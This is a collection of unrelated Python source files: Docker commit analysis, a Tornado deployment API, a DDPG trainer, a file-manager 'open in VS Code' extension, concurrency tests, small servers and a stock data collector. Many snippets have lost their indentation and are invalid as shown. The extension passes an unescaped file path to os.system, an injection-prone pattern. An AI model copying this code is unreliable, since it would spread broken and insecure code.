commits = [
str(commit.hexsha) for commit in list(repo.iter_commits('master'))
]
    commits = partition_commits(commits, cpus)
containers = []
for cpu in range(cpus):
container = start_container(
client,
image=image,
name="analysis_{}_cpu_{}".format(repo_name, cpu),
repo_dir="./repos/{}{}".format(repo_name, cpu),
result_dir=result_dir + "/data{}".format(cpu))
containers.append(container)
processes = [
Process(target=run_analysis, args=(i, containers[i], commits[i]))
for i in range(cpus)
]
for process in processes:
process.start()
for process in processes:
process.join()
for container in containers:
print(container.status)
print(container.name)
if (container.status != "exited" or container.status != "dead"):
container.kill()
container.remove()
shutil.rmtree("./repos", ignore_errors=True)
def parse_commits(commit_file):
"""
    Read the commits from a file and return the content.
"""
if not os.path.exists(commit_file):
print("commit_file doesn't exist!!", file=sys.stderr)
sys.exit(1)
commits = []
with open(commit_file, 'r') as cfile:
commits = [line.strip() for line in cfile.readlines()]
return commits
def assemble_directories(result_path, cpus=cpu_count()):
"""
Copy all results into a single directory.
"""
result_path = os.path.abspath(result_path)
paths = ["{}/data{}".format(result_path, i) for i in range(cpus)]
if not all([os.path.exists(p) for p in paths]):
print("data paths doesn't exists!", file=sys.stderr)
return
files = []
for path in paths:
for item in os.listdir(path):
commit = os.path.join(path, item)
            corrupt = len(os.listdir(commit)) != 2
if (os.path.isdir(commit) and not corrupt):
files.append((commit, item))
print("Saving all analysed commits into a single directory: {}/data_all".
format(result_path))
if not os.path.exists("{}/data_all".format(result_path)):
os.makedirs("{}/data_all".format(result_path))
for file_tuple in files:
if not os.path.exists("{}/data_all/{}".format(result_path, file_tuple[1])):
copy_tree(file_tuple[0], "{}/data_all/{}".format(result_path, file_tuple[1]))
def check_for_missing_commits(repo_path, result_path):
"""
    Function that checks whether all commits have been analyzed.
"""
result_dir = os.path.abspath(result_path)
if not os.path.exists(result_path):
print("Result path doesn't exist!", file=sys.stderr)
return
repo = Repo(repo_path)
current_commits = []
for item in os.listdir(result_dir):
current_commits.append(item)
all_repo_commits = [c.hexsha for c in list(repo.iter_commits('master'))]
missing_commits = set(all_repo_commits) - set(current_commits)
if missing_commits:
with open("./missing_commits.txt", 'w') as cfile:
for commit in missing_commits:
cfile.write(commit)
cfile.write('\n')
print("Wrote missing commits to missing_commits.txt")
if __name__ == "__main__":
PARSER = ArgumentParser(description="Utility to run several docker " +
"containers onto a git repository. " +
"Each container is given a set of " +
"commits and is instructed to run " +
"an analysis on each one of them.")
PARSER.add_argument(
"--analyse", "-a", action="store_true", help="Run an analysation.")
PARSER.add_argument(
"--image",
"-i",
type=str,
default="code-maat",
help="Specification of which image to use.")
PARSER.add_argument(
"--repo-dir",
"-r",
type=str,
default="../../jenkins",
help="Specification of which repo to use.")
PARSER.add_argument(
"--result-dir",
"-rd",
type=str,
default="/h/oskars",
help="Specification of where to store the result.")
PARSER.add_argument(
"--commits",
"-c",
type=str,
default=None,
help="Direction to a file containing commits to analyse.")
PARSER.add_argument(
"--assemble",
"-as",
action="store_true",
help="Assemble the results into a single directory.")
PARSER.add_argument(
"--missing-commits",
"-mc",
action="store_true",
help="Check for non analysed commits.")
ARGS = PARSER.parse_args()
global REPO
REPO = os.path.abspath(ARGS.repo_dir)
if ARGS.commits:
COMMITS = parse_commits(ARGS.commits)
else:
COMMITS = []
CLIENT = docker.from_env()
if ARGS.analyse:
print("Starting the analysis using {} cpus...".format(cpu_count()))
START = time.time()
if COMMITS:
start_analysis(ARGS.image, ARGS.result_dir, commits=COMMITS)
else:
start_analysis(ARGS.image, ARGS.result_dir)
STOP = time.time()
print("Done in {}".format(
time.strftime('%H:%M:%S', time.gmtime(STOP - START))))
print("Results can be found in {}".format(
ARGS.result_dir + "/data{" +
','.join(["{}".format(i) for i in range(cpu_count())]) + "}"))
if ARGS.assemble:
assemble_directories(ARGS.result_dir)
if ARGS.missing_commits:
check_for_missing_commits(ARGS.repo_dir, ARGS.result_dir)
|
lcm_api.py
|
import json
import uuid
import threading
import tornado.web
from app.service import token_service
from app.domain.task import Task
from app.domain.deployment import Deployment
from app.service import umm_client
from app.service import lcm_service
from app.utils import mytime
class LcmApi(tornado.web.RequestHandler):
def put(self, action, *args, **kwargs):
token = token_service.get_token(self.request)
user_login = token.username
has_role = token.has_role('ROLE_OPERATOR')
deployment = Deployment()
req = json.loads(str(self.request.body, encoding='utf-8'))
if action == 'change':
deployment.__dict__ = req['deployment']
else:
deployment.__dict__ = req
if user_login is None or (not has_role and user_login != deployment.deployer):
self.send_error(403)
return
if action == 'change':
if lcm_service.change(deployment, req['resource'], req['lcm']) is None:
self.send_error(500)
return
self.finish()
return
task = Task()
task.uuid = str(uuid.uuid4()).replace('-', '')
task.userLogin = user_login
task.taskStatus = '等待调度'
task.taskProgress = 0
task.targetUuid = deployment.uuid
task.startDate = mytime.now()
if action == 'stop':
            task.taskType = '实例停止'  # "instance stop"
            task.taskName = '实例停止-' + deployment.solutionName
action_service = lcm_service.stop
else:
self.send_error(400)
return
        try:
            umm_client.create_task(task, jwt=token.jwt)
        except:
            self.send_error(500)
            return
        thread = threading.Thread(target=action_service, args=(task.uuid, deployment))
        thread.daemon = True
thread.start()
self.finish()
async def get(self, action):
token = token_service.get_token(self.request)
user_login = token.username
has_role = token.has_role('ROLE_OPERATOR')
deployment_uuid = self.get_argument('uuid', None)
user = self.get_argument('user', None)
if user_login is None or (not has_role and user_login != user):
self.send_error(403)
return
if action == 'status':
res = await lcm_service.status(user, deployment_uuid)
res = res.__dict__
elif action == 'logs':
res = await lcm_service.logs(user, deployment_uuid)
else:
self.send_error(400)
return
if res is None:
self.send_error(403)
return
self.write(json.dumps(res))
|
ddpg_trainer.py
|
from __future__ import absolute_import
from builtins import object
import logging
import numpy as np
import six.moves.queue as queue
import threading
from relaax.common import profiling
from relaax.server.common import session
from relaax.common.algorithms.lib import episode
from relaax.common.algorithms.lib import observation
from relaax.common.algorithms.lib import utils
from . import ddpg_config as cfg
from . import ddpg_model
logger = logging.getLogger(__name__)
profiler = profiling.get_profiler(__name__)
class Trainer(object):
def __init__(self, parameter_server, metrics, exploit, hogwild_update):
self.exploit = exploit
self.ps = parameter_server
self.metrics = metrics
model = ddpg_model.AgentModel()
self.session = session.Session(model)
self.episode = episode.ReplayBuffer(['state', 'action', 'reward', 'terminal', 'next_state'],
cfg.config.buffer_size, seed=cfg.config.exploration.rnd_seed)
self.episode.begin()
self.observation = observation.Observation(cfg.config.input.history)
self.last_action = self.noise_epsilon = None
self.episode_cnt = self.cur_loop_cnt = 0
self.exploration_noise = utils.OUNoise(cfg.config.output.action_size,
cfg.config.exploration.ou_mu,
cfg.config.exploration.ou_theta,
cfg.config.exploration.ou_sigma,
cfg.config.exploration.rnd_seed)
self.max_q = self.step_cnt = 0
self.agent_weights_id = 0
self.terminal = False
if hogwild_update:
self.queue = queue.Queue(10)
threading.Thread(target=self.execute_tasks).start()
self.receive_experience()
else:
self.queue = None
if cfg.config.use_filter:
shape = cfg.config.input.shape
if shape == [0]:
shape = [1]
self.filter = utils.ZFilter(shape)
if cfg.config.no_ps:
self.session.op_initialize()
self.session.op_init_target_weights()
@property
def experience(self):
return self.episode.experience
@profiler.wrap
def begin(self):
self.do_task(self.receive_experience)
self.terminal = False
self.episode_cnt = self.ps.session.op_get_episode_cnt()
self.exploration_noise.reset(self.episode_cnt + cfg.config.exploration.rnd_seed)
self.noise_epsilon = np.exp(-self.episode_cnt / cfg.config.exploration.tau)
self.get_action()
@profiler.wrap
def step(self, reward, state, terminal):
if cfg.config.use_filter:
state = self.filter(state)
self.step_cnt += 1
if self.cur_loop_cnt == cfg.config.loop_size:
self.update()
self.do_task(self.receive_experience)
self.cur_loop_cnt = 0
if reward is not None:
self.push_experience(reward, state, terminal)
self.ps.session.op_add_rewards_to_model_score_routine(reward_sum=reward, reward_weight=1)
else:
self.observation.add_state(state)
self.cur_loop_cnt += 1
self.terminal = terminal
if terminal:
self.update()
self.cur_loop_cnt = 0
self.ps.session.op_inc_episode_cnt(increment=1)
self.observation.add_state(None)
Qmax = self.max_q / float(self.step_cnt)
print('Qmax: %.4f' % Qmax)
self.metrics.scalar('Qmax', Qmax, self.episode_cnt)
self.max_q = self.step_cnt = 0
assert self.last_action is None
self.get_action()
@profiler.wrap
def update(self):
if self.episode.size > cfg.config.batch_size:
experience = self.episode.sample(cfg.config.batch_size)
if not self.exploit:
self.do_task(lambda: self.send_experience(experience))
# Helper methods
def execute_tasks(self):
while True:
task = self.queue.get()
task()
def do_task(self, f):
if self.queue is None:
f()
else:
self.queue.put(f)
@profiler.wrap
def send_experience(self, experience):
# Calculate targets
action_target_scaled = self.session.op_get_actor_target(state=experience['next_state'])
target_q = self.session.op_get_critic_target(state=experience['next_state'],
action=action_target_scaled.astype(np.float32))
y = np.asarray(experience['reward']) + \
cfg.config.rewards_gamma * np.squeeze(target_q) * (~np.asarray(experience['terminal']))
critic_grads = self.session.op_compute_critic_gradients(state=experience['state'],
action=experience['action'],
predicted=np.vstack(y))
predicted_q = self.session.op_get_critic_q(state=experience['state'],
action=experience['action'])
self.max_q += np.amax(predicted_q)
scaled_out = self.session.op_get_action(state=experience['state'])
action_grads = self.session.op_compute_critic_action_gradients(state=experience['state'],
action=scaled_out)
actor_grads = self.session.op_compute_actor_gradients(state=experience['state'],
grad_ys=action_grads)
if self.terminal and cfg.config.log_lvl == 'DEBUG':
x = self.episode_cnt
self.metrics.histogram('action_target_scaled', action_target_scaled, x)
critic_sq_loss = self.session.op_critic_loss(state=experience['state'],
action=experience['action'],
predicted=np.vstack(y))
self.metrics.histogram('y', y, x)
self.metrics.scalar('critic_sq_loss', critic_sq_loss, x)
self.metrics.histogram('q_target', target_q, x)
self.metrics.histogram('q_predicted', predicted_q, x)
for i, g in enumerate(utils.Utils.flatten(critic_grads)):
self.metrics.histogram('grads_critic_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(action_grads)):
self.metrics.histogram('grads_action_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(actor_grads)):
self.metrics.histogram('grads_actor_%d' % i, g, x)
if cfg.config.log_lvl == 'VERBOSE':
norm_critic_grads = self.session.op_compute_norm_critic_gradients(state=experience['state'],
action=experience['action'],
predicted=np.vstack(y))
norm_action_grads = self.session.op_compute_norm_critic_action_gradients(
state=experience['state'], action=scaled_out)
norm_actor_grads = self.session.op_compute_norm_actor_gradients(state=experience['state'],
grad_ys=action_grads)
self.metrics.scalar('grads_norm_critic', norm_critic_grads)
self.metrics.scalar('grads_norm_action', norm_action_grads)
self.metrics.scalar('grads_norm_actor', norm_actor_grads)
self.metrics.histogram('batch_states', experience['state'])
self.metrics.histogram('batch_actions', experience['action'])
self.metrics.histogram('batch_rewards', experience['reward'])
self.metrics.histogram('batch_next_states', experience['next_state'])
if not cfg.config.no_ps:
self.ps.session.op_submit_gradients(gradients=(actor_grads, critic_grads),
step_inc=self.cur_loop_cnt,
agent_step=self.agent_weights_id)
self.ps.session.op_update_target_weights()
else:
self.session.op_apply_actor_gradients(gradients=actor_grads)
self.session.op_apply_critic_gradients(gradients=critic_grads)
self.ps.session.op_inc_step(increment=self.cur_loop_cnt)
self.session.op_update_target_weights()
@profiler.wrap
def receive_experience(self):
if not cfg.config.no_ps:
actor_weights, actor_target_weights, critic_weights, critic_target_weights, \
self.agent_weights_id = self.ps.session.op_get_weights_signed()
else:
actor_weights, actor_target_weights, critic_weights, critic_target_weights = \
self.session.op_get_weights()
self.session.op_assign_actor_weights(weights=actor_weights)
self.session.op_assign_critic_weights(weights=critic_weights)
self.session.op_assign_actor_target_weights(weights=actor_target_weights)
self.session.op_assign_critic_target_weights(weights=critic_target_weights)
if self.terminal and cfg.config.log_lvl == 'DEBUG':
x = self.episode_cnt
for i, g in enumerate(utils.Utils.flatten(actor_weights)):
self.metrics.histogram('weights_actor_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(critic_weights)):
self.metrics.histogram('weights_critic_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(actor_target_weights)):
self.metrics.histogram('weights_actor_target_%d' % i, g, x)
for i, g in enumerate(utils.Utils.flatten(critic_target_weights)):
self.metrics.histogram('weights_critic_target_%d' % i, g, x)
def push_experience(self, reward, state, terminal):
assert self.observation.queue is not None
assert self.last_action is not None
old_state = self.observation.queue
if state is not None:
self.observation.add_state(state)
self.episode.step(
state=old_state,
action=self.last_action,
reward=reward,
terminal=terminal,
next_state=self.observation.queue
)
if cfg.config.log_lvl == 'VERBOSE':
self.metrics.histogram('step_state', old_state)
self.metrics.histogram('step_action', self.last_action)
self.metrics.scalar('step_reward', reward)
self.last_action = None
def get_action(self):
if self.observation.queue is None:
self.last_action = None
else:
self.last_action = self.get_action_from_network()
if cfg.config.ou_noise:
self.last_action += self.noise_epsilon * self.exploration_noise.noise()
else:
self.last_action += 1. / (1. + float(self.episode_cnt))
assert self.last_action is not None
def get_action_from_network(self):
return self.session.op_get_action(state=[self.observation.queue])[0]
|
open-in-vscode-python3.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import locale, gettext, urllib.request, urllib.parse, urllib.error, os, subprocess
from gi.repository import Nemo, GObject
from multiprocessing import Process
EXTENSION_NAME = "nemo-open-in-vscode"
LOCALE_PATH = "/usr/share/locale/"
locale.setlocale(locale.LC_ALL, '')
gettext.bindtextdomain(EXTENSION_NAME, LOCALE_PATH)
gettext.textdomain(EXTENSION_NAME)
intl = gettext.gettext
class OpenInVSCode(GObject.GObject, Nemo.MenuProvider):
def __init__(self):
pass
def get_file_items(self, window, files):
if len(files) != 1: return
selected = files[0]
if selected.get_uri_scheme() not in ['file']: return
menu_item = Nemo.MenuItem(
name = 'NemoPython::open-in-vscode',
label = intl('Open in Visual Studio Code'),
tip = intl('Opens the selected folder or file in Visual Studio Code'),
icon = 'gtk-execute'
)
menu_item.connect('activate', self.execute, selected)
return menu_item,
def get_background_items(self, window, current_folder):
menu_item = Nemo.MenuItem(
name = 'NemoPython::open-in-vscode',
label = intl('Open in Visual Studio Code'),
tip = intl('Opens the current folder in Visual Studio Code'),
icon = 'gtk-execute'
)
menu_item.connect('activate', self.execute, current_folder)
return menu_item,
def launch(self, command):
os.system(command)
def execute(self, menu, selected):
uri = urllib.parse.unquote(selected.get_uri()[7:])
        try:
            code_bin = subprocess.check_output(['which', 'code'], universal_newlines=True).rstrip()
        except (subprocess.CalledProcessError, OSError):
            # 'code' was not found on PATH; do nothing.
            pass
else:
command = ' '.join([code_bin, uri, '--no-sandbox', '--unity-launch'])
proc = Process(target=self.launch, args=(command,))
proc.start()
proc.join()
|
test_lock.py
|
import os
import subprocess
import sys
import threading
import traceback
from modelkit.assets.remote import StorageProvider
from tests import TEST_DIR
def _start_wait_process(lock_path, duration_s):
script_path = os.path.join(TEST_DIR, "assets", "resources", "lock.py")
result = None
def run():
nonlocal result
try:
cmd = [sys.executable, script_path, lock_path, str(duration_s)]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, _ = p.communicate()
stdout = stdout.decode("utf-8")
if p.returncode:
print("ERROR", p.returncode, stdout, flush=True)
raise Exception("lock.py failed")
result = stdout
except Exception:
traceback.print_exc()
t = threading.Thread(target=run)
t.daemon = True
t.start()
def join():
t.join()
return result
return join
def test_lock_file(working_dir):
    # Start a bunch of processes competing for the lock
lock_path = os.path.join(working_dir, "lock")
threads = []
for _ in range(3):
t = _start_wait_process(lock_path, 2)
threads.append(t)
    # For each process, collect the timestamps at which it acquired and
    # released the lock, as well as the number of wait loops.
ranges = []
while threads:
t = threads.pop()
res = t()
assert res is not None
lines = res.splitlines()
assert len(lines) == 2
start = lines[0]
end = lines[1]
ranges.append((float(start), float(end)))
ranges.sort()
    # Check the ranges are mutually exclusive: the lock works, assuming it
    # was actually contended.
for i in range(len(ranges) - 1):
end = ranges[i][1]
start = ranges[i + 1][0]
assert end <= start
def test_lock_assetsmanager(capsys, working_dir):
assets_dir = os.path.join(working_dir, "assets_dir")
os.makedirs(assets_dir)
driver_path = os.path.join(working_dir, "local_driver")
os.makedirs(os.path.join(driver_path, "bucket"))
# push an asset
mng = StorageProvider(
provider="local",
bucket=driver_path,
prefix="prefix",
)
data_path = os.path.join(TEST_DIR, "assets", "testdata", "some_data_folder")
mng.new(data_path, "category-test/some-data.ext", "0.0")
# start 4 processes that will attempt to download it
script_path = os.path.join(TEST_DIR, "assets", "resources", "download_asset.py")
cmd = [
sys.executable,
script_path,
assets_dir,
driver_path,
"category-test/some-data.ext:0.0",
]
def run():
p = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
stdout, _ = p.communicate()
stdout = stdout.decode("utf-8")
print(stdout)
threads = []
for _ in range(2):
t = threading.Thread(target=run)
threads.append(t)
t.start()
for t in threads:
t.join()
captured = capsys.readouterr()
assert "__ok_from_cache__" in captured.out
assert "__ok_not_from_cache__" in captured.out
|
cluster_test.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import parl
from parl.remote.master import Master
from parl.remote.worker import Worker
import time
import threading
from parl.remote.client import disconnect
from parl.remote import exceptions
import timeout_decorator
import subprocess
@parl.remote_class
class Actor(object):
def __init__(self, arg1=None, arg2=None):
self.arg1 = arg1
self.arg2 = arg2
def get_arg1(self):
return self.arg1
def get_arg2(self):
return self.arg2
def set_arg1(self, value):
self.arg1 = value
def set_arg2(self, value):
self.arg2 = value
def get_unable_serialize_object(self):
return UnableSerializeObject()
def add_one(self, value):
value += 1
return value
def add(self, x, y):
time.sleep(3)
return x + y
def will_raise_exception_func(self):
x = 1 / 0
class TestCluster(unittest.TestCase):
def tearDown(self):
disconnect()
def test_actor_exception(self):
master = Master(port=1235)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:1235', 1)
for _ in range(3):
if master.cpu_num == 1:
break
time.sleep(10)
self.assertEqual(1, master.cpu_num)
parl.connect('localhost:1235')
with self.assertRaises(exceptions.RemoteError):
actor = Actor(abcd='a bug')
actor2 = Actor()
for _ in range(3):
if master.cpu_num == 0:
break
time.sleep(10)
self.assertEqual(actor2.add_one(1), 2)
self.assertEqual(0, master.cpu_num)
master.exit()
worker1.exit()
@timeout_decorator.timeout(seconds=800)
    def test_actor_exception_with_timeout(self):
master = Master(port=1236)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:1236', 1)
self.assertEqual(1, master.cpu_num)
parl.connect('localhost:1236')
actor = Actor()
try:
actor.will_raise_exception_func()
except:
pass
actor2 = Actor()
for _ in range(5):
if master.cpu_num == 0:
break
time.sleep(10)
self.assertEqual(actor2.add_one(1), 2)
self.assertEqual(0, master.cpu_num)
del actor
del actor2
worker1.exit()
master.exit()
def test_reset_actor(self):
# start the master
master = Master(port=1237)
th = threading.Thread(target=master.run)
th.start()
time.sleep(3)
worker1 = Worker('localhost:1237', 4)
parl.connect('localhost:1237')
for _ in range(10):
actor = Actor()
ret = actor.add_one(1)
self.assertEqual(ret, 2)
del actor
for _ in range(10):
if master.cpu_num == 4:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 4)
worker1.exit()
master.exit()
def test_add_worker(self):
master = Master(port=1234)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
worker1 = Worker('localhost:1234', 4)
for _ in range(3):
if master.cpu_num == 4:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 4)
worker2 = Worker('localhost:1234', 4)
for _ in range(3):
if master.cpu_num == 8:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 8)
worker2.exit()
for _ in range(10):
if master.cpu_num == 4:
break
time.sleep(10)
self.assertEqual(master.cpu_num, 4)
master.exit()
worker1.exit()
if __name__ == '__main__':
unittest.main()
|
server.py
|
from BaseHTTPServer import HTTPServer
from httpHandler import HttpHandler
from multiprocessing import Process
import asyncore
import socketServer
def __create_http():
http = HTTPServer(('0.0.0.0', 9000), HttpHandler)
print 'HTTP server started...'
http.serve_forever()
def __create_sock():
socketServer.SocketServer('0.0.0.0', 9001)
print 'Socket server started...'
asyncore.loop()
def main():
hs = Process(target=__create_http, args=[])
ss = Process(target=__create_sock, args=[])
    try:
        hs.start()
        ss.start()
    except KeyboardInterrupt:
        ss.terminate()
        hs.terminate()
        print 'KeyboardInterrupt: closing servers'
    except Exception as e:
        ss.terminate()
        hs.terminate()
        print 'ERROR: ' + str(e)
if __name__ =='__main__': main()
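# Usage note: running this module starts the HTTP server on port 9000 and
# the asyncore-based socket server on port 9001, each in its own process.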
|
messagethrottler.py
|
import time
import threading
import Queue
class MessageThrottler:
def __init__(self, transmitter, max_pages = 3, interval = 15):
self.max_pages = max_pages
self.interval = interval
self.transmitter = transmitter
self._setup_thread()
def _setup_thread(self):
self.message_queue = Queue.Queue()
self.running = True
t = threading.Thread(target=self._message_loop)
t.daemon = True
t.start()
def add_message(self, message):
self.message_queue.put(message)
def _message_loop(self):
next_page = 0
full = False
while self.running:
message = self.message_queue.get()
            # a newly received message is first displayed alone on the
            # screen for one interval, without the previous messages
if message == "clear":
self.transmitter.clear_screen()
next_page = 0
full = False
else:
self.transmitter.add_message(message, next_page)
self.transmitter.set_schedule([next_page])
time.sleep(self.interval)
next_page += 1
if next_page > self.max_pages:
next_page = 0
full = True
schedule = range(0, self.max_pages)
if not full:
schedule = range(0, next_page)
            # the messages are then displayed in reverse chronological order
schedule.reverse()
self.transmitter.set_schedule(schedule)
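# Example usage (hypothetical transmitter; the real object must provide
# clear_screen(), add_message(msg, page) and set_schedule(pages)):
#   throttler = MessageThrottler(transmitter, max_pages=3, interval=15)
#   throttler.add_message("first alert")
#   throttler.add_message("clear")  # wipes the screen and restarts paging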
|
threadsafety.py
|
from __future__ import division
"""The Python interpreter may switch between threads inbetween bytecode
execution. Bytecode execution in fastcache may occur during:
(1) Calls to make_key which will call the __hash__ methods of the args and
(2) `PyDict_Get(Set)Item` calls rely on Python comparisons (i.e, __eq__)
to determine if a match has been found
A good test for threadsafety is then to cache a function which takes user
defined Python objects that have __hash__ and __eq__ methods which live in
Python land rather built-in land.
The test should not only ensure that the correct result is acheived (and no
segfaults) but also assess memory leaks.
The thread switching interval can be altered using sys.setswitchinterval.
"""
class PythonInt:
""" Wrapper for an integer with python versions of __eq__ and __hash__."""
def __init__(self, val):
self.value = val
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
# only compare with other instances of PythonInt
if not isinstance(other, PythonInt):
raise TypeError("PythonInt cannot be compared to %s" % type(other))
return self.value == other.value
from fastcache import clru_cache
#from functools import lru_cache as clru_cache
from random import randint
CACHE_SIZE=301
FIB=CACHE_SIZE-1
RAND_MIN, RAND_MAX = 1, 10
@clru_cache(maxsize=CACHE_SIZE, typed=False)
def fib(n):
"""Terrible Fibonacci number generator."""
v = n.value
return v if v < 2 else fib(PythonInt(v-1)) + fib(PythonInt(v-2))
# establish the correct result from single-threaded execution
RESULT = fib(PythonInt(FIB))
def run_fib_with_clear(r):
""" Run Fibonacci generator r times. """
for i in range(r):
if randint(RAND_MIN, RAND_MAX) == RAND_MIN:
fib.cache_clear()
res = fib(PythonInt(FIB))
if RESULT != res:
raise ValueError("Expected %d, Got %d" % (RESULT, res))
def run_fib_with_stats(r):
""" Run Fibonacci generator r times. """
for i in range(r):
res = fib(PythonInt(FIB))
if RESULT != res:
raise ValueError("Expected %d, Got %d" % (RESULT, res))
from threading import Thread
try:
from sys import setswitchinterval as setinterval
except ImportError:
from sys import setcheckinterval
def setinterval(i):
return setcheckinterval(int(i))
def run_threads(threads):
for t in threads:
t.start()
for t in threads:
t.join()
def run_test(n, r, i):
""" Run thread safety test with n threads r times using interval i. """
setinterval(i)
threads = [Thread(target=run_fib_with_clear, args=(r, )) for _ in range(n)]
run_threads(threads)
def run_test2(n, r, i):
""" Run thread safety test to make sure the cache statistics
are correct."""
fib.cache_clear()
setinterval(i)
threads = [Thread(target=run_fib_with_stats, args=(r, )) for _ in range(n)]
run_threads(threads)
hits, misses, maxsize, currsize = fib.cache_info()
if misses != CACHE_SIZE:
raise ValueError("Expected %d misses, Got %d" %
(CACHE_SIZE, misses))
if maxsize != CACHE_SIZE:
raise ValueError("Expected %d maxsize, Got %d" %
(CACHE_SIZE, maxsize))
if currsize != CACHE_SIZE:
raise ValueError("Expected %d currsize, Got %d" %
(CACHE_SIZE, currsize))
import argparse
def main():
parser = argparse.ArgumentParser(description='Run threadsafety test.')
    parser.add_argument('-n', '--numthreads',
                        type=int,
                        default=2,
                        dest='n',
                        help='Number of threads.')
    parser.add_argument('-r', '--repeat',
                        type=int,
                        default=5000,
                        dest='r',
                        help='Number of times to repeat test. Larger numbers '
                             'will make it easier to spot memory leaks.')
    parser.add_argument('-i', '--interval',
                        type=float,
                        default=1e-6,
                        dest='i',
                        help='Time in seconds for sys.setswitchinterval.')
run_test(**dict(vars(parser.parse_args())))
run_test2(**dict(vars(parser.parse_args())))
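# Example invocation (values are illustrative):
#   python threadsafety.py -n 4 -r 2000 -i 1e-6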
if __name__ == "__main__":
main()
|
deal_new.py
|
import numpy as np
import os
import threading
import goal_address
np.random.seed(1337)
path='1.txt'
db = goal_address.connectdb()
def file_name(file_dir):
for root, dirs, files in os.walk(file_dir):
return files
def load(path):
f = open("./txt/"+path)
f2=open("./new_content/"+path,'w')
type = 1
mid = []
list = [0.0 for i in range(200)]
type_content = 0
for line in f:
if line.strip() == '':
type = 1
if type_content==0:
f2.write('\n')
continue
if type == 1:
goal = goal_address.search_goal(line.strip('\n').rstrip(),db)
# Y.append(line.strip('\n').rstrip())
if(goal!=0):
type_content = 0
f2.write(str(goal))
f2.write('\n')
else:
type_content = 1
type = 0
elif type_content==0:
f2.write(line)
f.close()
f2.close()
files=file_name("./txt/")
for file in files:
    if file != '.DS_Store':
        # target must be the function itself; calling load(file) here would
        # run it immediately and pass its return value (None) as the target.
        t = threading.Thread(target=load, args=(file,), name=file)
        t.start()
        t.join()  # joining right away serializes the work; see the sketch below
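# A concurrent variant (a sketch, not in the original): start every thread
# before joining any of them, so the files are processed in parallel.
#   workers = [threading.Thread(target=load, args=(f,), name=f)
#              for f in files if f != '.DS_Store']
#   for w in workers:
#       w.start()
#   for w in workers:
#       w.join()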
|
stockbarcollector.py
|
# **************************************************************************** #
# #
# ::: :::::::: #
# stockBarCollector.py :+: :+: :+: #
# +:+ +:+ +:+ #
# By: zhongjy1992 <zhongjy1992@outlook.com> +#+ +:+ +#+ #
# +#+#+#+#+#+ +#+ #
# Created: 2019/10/01 22:07:05 by zhongjy1992 #+# #+# #
# Updated: 2020/03/07 13:10:45 by zhongjy1992 ### ########.fr #
# #
# **************************************************************************** #
import datetime
import json
import logging
import os
import threading
import time
import click
from QAPUBSUB.consumer import subscriber_routing
from QAPUBSUB.producer import publisher
from QARealtimeCollector.setting import eventmq_ip
from QUANTAXIS.QAFetch.QAQuery_Advance import QA_fetch_stock_min_adv, QA_fetch_stock_day_adv, QA_fetch_index_day_adv
from QUANTAXIS.QAUtil.QADate_trade import QA_util_get_pre_trade_date
from pandas import concat, DataFrame, DatetimeIndex, Series
from QUANTAXIS.QAFetch.QATdx_adv import QA_Tdx_Executor
#from QARealtimeCollector.utils.QATdx_adv import QA_Tdx_Executor
# from utils.TdxAdv import QA_Tdx_Executor
from QARealtimeCollector.utils.common import util_is_trade_time, get_file_name_by_date, logging_csv
from pandas.core.series import Series
import pyarrow as pa
logger = logging.getLogger(__name__)
class QARTCStockBar(QA_Tdx_Executor):
    # TODO: TDX issues must be fixed separately; this class only sketches one
    #       way to collect, distribute and resample minute bars.
    # TODO: stock subscriptions should be made via HTTP requests as described
    #       in the documentation.
def __init__(self, delay=10.5, date: datetime.datetime = None, log_dir='./log', debug=False):
super().__init__(name='QA_REALTIME_COLLECTOR_STOCK_BAR', thread_num=None, timeout=0.5)
cur_time = datetime.datetime.now() if date is None else date
        # run the QA_Tdx_Executor in debug mode
self.debug = debug
self.cur_year = cur_time.year
self.cur_month = cur_time.month
self.cur_day = cur_time.day
self.isRequesting = False
        self.delay = delay  # interval between data fetch requests
self.code_list = []
self.sub = subscriber_routing(host=eventmq_ip, exchange='QARealtime_Market', routing_key='stock')
self.sub.callback = self.callback
self.pub = publisher(host=eventmq_ip, exchange='realtime_stock_min')
self.log_dir = log_dir
self.pre_market_data = None
self.last_update_time = cur_time
threading.Thread(target=self.sub.start, daemon=True).start()
logger.info("QA_REALTIME_COLLECTOR_STOCK_BAR INIT, delay %s" % self.delay)
def subscribe_callback(self, code):
"""
        Subscription callback.
:param code:
:return:
"""
if not isinstance(code, str):
logger.error('not string , %s' % code)
return
today = datetime.datetime(self.cur_year, self.cur_month, self.cur_day).isoformat()[:10]
end_date = QA_util_get_pre_trade_date(cursor_date=today, n=1)[:10]
if code not in self.code_list:
self.code_list.append(code)
            # ETF or stock: fetch the previous trading day's closing price
logger.info("try fetch %s ,%s" % (code, end_date))
if code.startswith('5') or code.startswith('1'):
_data = QA_fetch_index_day_adv(code, end_date, end_date)
else:
_data = QA_fetch_stock_day_adv(code, end_date, end_date)
if _data is not None:
self.pre_market_data = concat([self.pre_market_data, _data.data.reset_index()])
logger.info("fetch %s" % _data.data.to_csv(header=False))
# initial data from server
# self.get_history_data(code, frequency="1min")
def unsubscribe_callback(self, code):
"""
        Unsubscribe callback.
:param code:
:return:
"""
self.code_list.remove(code)
def publish_msg(self, msg):
self.pub.pub(msg)
